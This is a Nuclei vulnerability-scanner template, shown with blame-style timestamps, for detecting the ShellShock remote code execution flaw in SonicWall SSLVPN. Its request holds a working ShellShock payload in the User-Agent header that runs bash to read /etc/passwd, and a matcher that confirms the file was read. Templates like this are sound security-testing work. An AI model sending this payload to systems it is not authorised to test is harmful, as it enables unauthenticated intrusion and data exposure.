nuclei-templates/vulnerabilities/other/sonicwall-sslvpn-shellshock...

38 lines
1006 B
YAML
Raw Normal View History

2021-01-26 10:20:46 +00:00
id: sonicwall-sslvpn-shellshock
info:
name: Sonicwall SSLVPN - Remote Code Execution (ShellShock)
2021-01-26 10:20:46 +00:00
author: PR3R00T
severity: critical
description: |
Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
reference:
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: shellshock,sonicwall,rce,vpn
2021-01-26 10:20:46 +00:00
requests:
2021-01-26 10:40:48 +00:00
- raw:
2021-01-26 10:44:17 +00:00
- |
2021-01-26 10:20:46 +00:00
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: {{Hostname}}
User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept: */*
2021-01-26 14:31:01 +00:00
matchers-condition: and
matchers:
2021-01-26 10:20:46 +00:00
- type: regex
part: body
2021-01-26 10:20:46 +00:00
regex:
- "root:.*:0:0:"
2021-01-26 10:20:46 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/30